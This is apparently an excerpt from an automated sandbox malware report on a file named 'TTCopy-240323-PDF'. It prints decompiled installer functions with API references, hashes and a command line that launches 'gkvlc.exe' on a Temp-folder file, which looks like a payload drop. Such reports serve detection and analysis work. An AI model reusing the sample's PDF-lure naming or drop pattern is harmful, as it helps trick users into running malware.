                                                                                            0x004059ac
                                                                                            0x004059ac
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • GetDlgItem.USER32 ref: 00405867
                                                                                            • GetDlgItem.USER32 ref: 00405876
                                                                                            • GetClientRect.USER32 ref: 004058B3
                                                                                            • GetSystemMetrics.USER32 ref: 004058BA
                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405956
                                                                                            • GetDlgItem.USER32 ref: 00405977
                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                                                            • GetDlgItem.USER32 ref: 00405885
                                                                                              • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                            • GetDlgItem.USER32 ref: 004059C9
                                                                                            • CreateThread.KERNEL32 ref: 004059D7
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                                                                            • ShowWindow.USER32(00000000), ref: 00405A02
                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                                                            • ShowWindow.USER32(00000008), ref: 00405A51
                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                                                            • CreatePopupMenu.USER32 ref: 00405A96
                                                                                            • AppendMenuW.USER32 ref: 00405AAA
                                                                                            • GetWindowRect.USER32 ref: 00405ACA
                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                                                            • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                                                            • EmptyClipboard.USER32 ref: 00405B31
                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                                                            • GlobalLock.KERNEL32 ref: 00405B47
                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                                                            • SetClipboardData.USER32 ref: 00405B86
                                                                                            • CloseClipboard.USER32 ref: 00405B8C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                            • String ID: H7B${
                                                                                            • API String ID: 590372296-2256286769
                                                                                            • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                                                            • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                                                            • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                                                            • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 78%
                                                                                            			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\engineer\\AppData\\Local\\Temp") {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                                                            0x00404ab5
                                                                                            0x00404abb
                                                                                            0x00404ac1
                                                                                            0x00404ace
                                                                                            0x00404adc
                                                                                            0x00404adf
                                                                                            0x00404ae7
                                                                                            0x00404aed
                                                                                            0x00404aed
                                                                                            0x00404af9
                                                                                            0x00404afc
                                                                                            0x00404b6a
                                                                                            0x00404b71
                                                                                            0x00404c48
                                                                                            0x00404c4f
                                                                                            0x00404c5e
                                                                                            0x00404c5e
                                                                                            0x00404c62
                                                                                            0x00404c6c
                                                                                            0x00404c79
                                                                                            0x00404c7b
                                                                                            0x00404c7b
                                                                                            0x00404c89
                                                                                            0x00404c90
                                                                                            0x00404c97
                                                                                            0x00404c9a
                                                                                            0x00404cd6
                                                                                            0x00404cd8
                                                                                            0x00404cde
                                                                                            0x00404ce3
                                                                                            0x00404ce7
                                                                                            0x00404ce9
                                                                                            0x00404ce9
                                                                                            0x00404d05
                                                                                            0x00000000
                                                                                            0x00404d07
                                                                                            0x00404d0a
                                                                                            0x00404d18
                                                                                            0x00404d1e
                                                                                            0x00404d1f
                                                                                            0x00404d22
                                                                                            0x00404d25
                                                                                            0x00000000
                                                                                            0x00404d25
                                                                                            0x00404c9c
                                                                                            0x00404c9e
                                                                                            0x00404ca2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404ca4
                                                                                            0x00404ca4
                                                                                            0x00404cb1
                                                                                            0x00404cb6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404cba
                                                                                            0x00404cbc
                                                                                            0x00404cbc
                                                                                            0x00404cc5
                                                                                            0x00404cc7
                                                                                            0x00404ccc
                                                                                            0x00404ccf
                                                                                            0x00404cd4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404cd4
                                                                                            0x00404d31
                                                                                            0x00404d3b
                                                                                            0x00404d3e
                                                                                            0x00404d41
                                                                                            0x00404d48
                                                                                            0x00404d48
                                                                                            0x00404d4a
                                                                                            0x00404d4a
                                                                                            0x00404d4f
                                                                                            0x00404d51
                                                                                            0x00404d59
                                                                                            0x00404d60
                                                                                            0x00404d62
                                                                                            0x00404d6d
                                                                                            0x00404d6d
                                                                                            0x00404d62
                                                                                            0x00404d7d
                                                                                            0x00404d87
                                                                                            0x00404d8f
                                                                                            0x00404daa
                                                                                            0x00404d91
                                                                                            0x00404d9a
                                                                                            0x00404d9a
                                                                                            0x00404d8f
                                                                                            0x00404daf
                                                                                            0x00404db4
                                                                                            0x00404db9
                                                                                            0x00404dc2
                                                                                            0x00404dc2
                                                                                            0x00404dcb
                                                                                            0x00404dcd
                                                                                            0x00404dcd
                                                                                            0x00404dd9
                                                                                            0x00404de1
                                                                                            0x00404deb
                                                                                            0x00404deb
                                                                                            0x00404df0
                                                                                            0x00000000
                                                                                            0x00404df0
                                                                                            0x00404c9a
                                                                                            0x00404c51
                                                                                            0x00404c58
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404c58
                                                                                            0x00404b77
                                                                                            0x00404b80
                                                                                            0x00404b9a
                                                                                            0x00404b9f
                                                                                            0x00404ba9
                                                                                            0x00404bb0
                                                                                            0x00404bbc
                                                                                            0x00404bbf
                                                                                            0x00404bc2
                                                                                            0x00404bc9
                                                                                            0x00404bd1
                                                                                            0x00404bd4
                                                                                            0x00404bd8
                                                                                            0x00404bdf
                                                                                            0x00404be7
                                                                                            0x00404c41
                                                                                            0x00404be9
                                                                                            0x00404bea
                                                                                            0x00404bf1
                                                                                            0x00404bfb
                                                                                            0x00404c03
                                                                                            0x00404c10
                                                                                            0x00404c24
                                                                                            0x00404c28
                                                                                            0x00404c28
                                                                                            0x00404c24
                                                                                            0x00404c2d
                                                                                            0x00404c3a
                                                                                            0x00404c3a
                                                                                            0x00404be7
                                                                                            0x00000000
                                                                                            0x00404b9f
                                                                                            0x00404b8d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404b93
                                                                                            0x00000000
                                                                                            0x00404afe
                                                                                            0x00404b0b
                                                                                            0x00404b14
                                                                                            0x00404b21
                                                                                            0x00404b21
                                                                                            0x00404b28
                                                                                            0x00404b2e
                                                                                            0x00404b37
                                                                                            0x00404b3a
                                                                                            0x00404b3d
                                                                                            0x00404b45
                                                                                            0x00404b48
                                                                                            0x00404b4b
                                                                                            0x00404b51
                                                                                            0x00404b58
                                                                                            0x00404b5f
                                                                                            0x00404df6
                                                                                            0x00404e08
                                                                                            0x00404b65
                                                                                            0x00404b68
                                                                                            0x00000000
                                                                                            0x00404b68
                                                                                            0x00404b5f

                                                                                            APIs
                                                                                            • GetDlgItem.USER32 ref: 00404B04
                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                                                            • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,00423748,00000000,?,?), ref: 00404C1C
                                                                                            • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi), ref: 00404C28
                                                                                            • SetDlgItemTextW.USER32 ref: 00404C3A
                                                                                              • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                                                              • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,746AFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                              • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                              • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,746AFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                              • Part of subcall function 004068EF: CharPrevW.USER32(?,?,746AFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                            • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                                              • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                              • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                                              • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: "C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi$A$C:\Users\user\AppData\Local\Temp$H7B
                                                                                            • API String ID: 2624150263-1070934887
                                                                                            • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                            • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                                                            • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                            • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 67%
                                                                                            			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\engineer\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                                                            0x004021b3
                                                                                            0x004021bd
                                                                                            0x004021c7
                                                                                            0x004021d1
                                                                                            0x004021dc
                                                                                            0x004021df
                                                                                            0x004021f9
                                                                                            0x004021fc
                                                                                            0x00402202
                                                                                            0x00402205
                                                                                            0x0040220f
                                                                                            0x00402213
                                                                                            0x00402213
                                                                                            0x00402218
                                                                                            0x00402229
                                                                                            0x00402231
                                                                                            0x004022e8
                                                                                            0x004022e8
                                                                                            0x004022ef
                                                                                            0x00402237
                                                                                            0x00402237
                                                                                            0x00402246
                                                                                            0x0040224a
                                                                                            0x0040224d
                                                                                            0x00402253
                                                                                            0x00402261
                                                                                            0x00402264
                                                                                            0x00402266
                                                                                            0x00402271
                                                                                            0x00402271
                                                                                            0x00402276
                                                                                            0x00402278
                                                                                            0x0040227f
                                                                                            0x0040227f
                                                                                            0x00402282
                                                                                            0x0040228b
                                                                                            0x0040228e
                                                                                            0x00402294
                                                                                            0x00402296
                                                                                            0x004022a0
                                                                                            0x004022a0
                                                                                            0x004022a3
                                                                                            0x004022ac
                                                                                            0x004022af
                                                                                            0x004022b8
                                                                                            0x004022be
                                                                                            0x004022c0
                                                                                            0x004022ce
                                                                                            0x004022ce
                                                                                            0x004022d1
                                                                                            0x004022d7
                                                                                            0x004022d7
                                                                                            0x004022da
                                                                                            0x004022e0
                                                                                            0x004022e6
                                                                                            0x004022fb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004022e6
                                                                                            0x004022f1
                                                                                            0x00402c2d
                                                                                            0x00402c39

                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateInstance
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                            • API String ID: 542301482-1104044542
                                                                                            • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                                                            • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                                                            • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                                                            • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 39%
                                                                                            			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                                                            0x00402923
                                                                                            0x0040293e
                                                                                            0x00402949
                                                                                            0x0040294a
                                                                                            0x00402a94
                                                                                            0x00402925
                                                                                            0x00402928
                                                                                            0x0040292b
                                                                                            0x0040292e
                                                                                            0x0040292e
                                                                                            0x00402c2d
                                                                                            0x00402c39

                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
